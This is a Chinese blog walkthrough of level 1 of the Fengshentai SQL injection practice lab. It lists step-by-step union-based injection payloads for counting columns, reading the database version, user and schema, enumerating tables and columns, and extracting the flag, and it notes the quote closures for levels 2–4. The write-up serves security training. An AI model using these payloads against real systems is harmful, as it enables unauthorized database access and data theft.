• 1.封神台sql注入实战靶场


    封神台sql注入实战靶场

    通过注入找到数据库中的Flag吧,Flag格式zKaQ-XXXXXXXX

    基础靶场1

    http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1
    

    数字型注入

    image-20210114212424680

    判断字段个数

    ?id=2 order by 1
    ?id=2 order by 2
    ?id=2 order by 3
    ?id=2 order by 4    报错
    

    image-20210114212703410

    得出结论字段个数为3

    判断数据在页面的显示位置

    ?id=2 and 1=2 union select 1,2,3
    

    image-20210114213250018

    判断数据库类型和版本

    ?id=2 and 1=2 union select 1,@@datadir,version()
    

    image-20210114213402449

    获取当前库名和用户

    ?id=2 and 1=2 union select 1,database(),user()
    

    image-20210114213456868

    获取库下面所有的表名

    ?id=1 and 1=2 union select 1,group_concat(table_name),2 from information_schema.tables where table_schema=database() --+
    

    image-20210114213721378

    获取表下面的所有字段名

    ?id=1 and 1=2 union select 1,group_concat(column_name),2 from information_schema.columns where table_schema=database() and table_name='error_flag' --+
    

    image-20210114215811063

    获取值

    ?id=1 and 1=2 union select 1,group_concat(flag),2 from error.error_flag --+
    

    image-20210114220016034

    一下子全爆出来了,盲猜这是前四关的flag,经过验证果然是,前四关只是sql语句的闭合方式不同而已,都可

    以用联合注入获取flag

    闭合方式

    基础靶场1     数字型,不需要闭合基础靶场2     '基础靶场3    ')基础靶场4    ")
    
  • 相关阅读:
    java中的迭代器的含义
    angular-指令总结
    angular-ng-model
    angular-创建自定义的指令
    angular-$scope和$rootScope
    angular-过滤器
    Git-pull进入vim窗口解决办法
    Math常用方法
    全局变量和window属性上定义的变量
    透明点点的轮播图
  • 原文地址:https://www.cnblogs.com/xcymn/p/15712461.html
Copyright © 2020-2023  润新知